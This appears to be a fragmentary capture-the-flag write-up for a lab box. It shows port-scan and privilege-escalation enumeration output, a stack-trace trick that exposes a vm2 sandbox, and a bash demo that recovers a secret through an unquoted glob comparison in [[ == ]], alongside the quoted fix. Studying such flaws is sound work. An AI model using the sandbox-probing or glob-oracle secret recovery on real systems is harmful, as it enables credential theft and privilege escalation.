kali@kali ~> nmap -p- -n --min-rate 2000 -T4 10.10.11.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-09 13:32 EST
Warning: 10.10.11.239 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.239
Host is up (0.26s latency).
Not shown: 62499 filtered tcp ports (no-response), 3034 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 225.27 seconds
// Throw-away snippet run inside the editor's sandbox: creating an Error and
// printing its .stack reveals the call chain that wraps the user code.
function stackTrace() {
    var err = new Error();
    console.log(err.stack);
}
stackTrace();

Running the snippet above returns the following stack trace, which exposes the sandboxing library (vm2) and its on-disk path:
Error
    at stackTrace (vm.js:2:15)
    at vm.js:5:1
    at Script.runInContext (node:vm:135:12)
    at VM.runScript (/var/www/editor/node_modules/vm2/lib/vm.js:285:18)
    at /var/www/editor/node_modules/vm2/lib/vm.js:507:16
    at timeout_bridge.js:1:1
    at Script.runInContext (node:vm:135:12)
    at doWithTimeout (/var/www/editor/node_modules/vm2/lib/vm.js:132:29)
    at VM.run (/var/www/editor/node_modules/vm2/lib/vm.js:506:10)
    at /var/www/editor/index.js:51:27
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it

╔══════════╣ Searching root files in home dirs (limit 30)
/root/
/var/www
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
The shell performs tilde expansion, parameter and variable expansion, arithmetic expansion, command substitution, process substitution, and quote removal on those words (the expansions that would occur if the words were enclosed in double quotes).
The second link also contains this sentence:
With the [[ … ]] construct, both = and == are equal (at least in Bash) and the right side of the operator is taken as a pattern, like in a filename glob, unless it is quoted. (Filenames are not expanded within [[ … ]]).
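Putting the two man-page sentences together: when the right-hand side of `==` inside `[[ … ]]` is an unquoted variable, the user-supplied value is matched as a glob, so `s*` "equals" any secret starting with `s`, and the secret can be recovered one character at a time. The bash script below is an added example (not the `mysql-backup.sh` script from the box and not code from the original page): the secret, the charset and the `check_vuln`/`check_safe` functions are constructed for illustration. It needs bash, since `[[ … ]]` is not POSIX sh.

```shell
#!/usr/bin/env bash
# Added example: unquoted RHS in [[ == ]] is a pattern match, quoted RHS is a
# literal compare. SECRET is a constructed sample value, not a real credential.

SECRET='s3cr3t!'

# Vulnerable comparison: $guess is unquoted, so it is treated as a glob.
check_vuln() {
    local guess="$1"
    [[ $SECRET == $guess ]]
}

# Hardened comparison: quoting the RHS forces a literal string comparison.
check_safe() {
    local guess="$1"
    [[ $SECRET == "$guess" ]]
}

# Recover SECRET through the vulnerable check by extending a known prefix
# and appending '*'. The charset is a hypothetical, deliberately small set;
# widen it to the full printable range for real use. Returns 1 if the secret
# contains a character outside the charset.
recover_secret() {
    local charset='abcdefghijklmnopqrstuvwxyz0123456789!'
    local found='' c i progressed
    while true; do
        # An exact (glob-free) match of the prefix means no characters remain.
        if [[ -n $found ]] && check_vuln "$found"; then
            printf '%s\n' "$found"
            return 0
        fi
        progressed=0
        for (( i = 0; i < ${#charset}; i++ )); do
            c=${charset:i:1}
            # "prefix + c + *" matches only if c is the next secret character.
            if check_vuln "${found}${c}*"; then
                found+="$c"
                progressed=1
                break
            fi
        done
        (( progressed )) || return 1
    done
}

# Stand-alone demonstration.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    check_vuln 's*'  && echo "vulnerable check accepts the glob 's*'"
    check_safe 's*'  || echo "hardened check rejects the glob 's*'"
    echo "recovered via glob oracle: $(recover_secret)"
fi
```

The oracle works because `[[ … ]]` never expands filenames, so `*` and `?` reach the comparison intact; the only fix the script author needs is the double quotes around the right-hand side, exactly as the man page says.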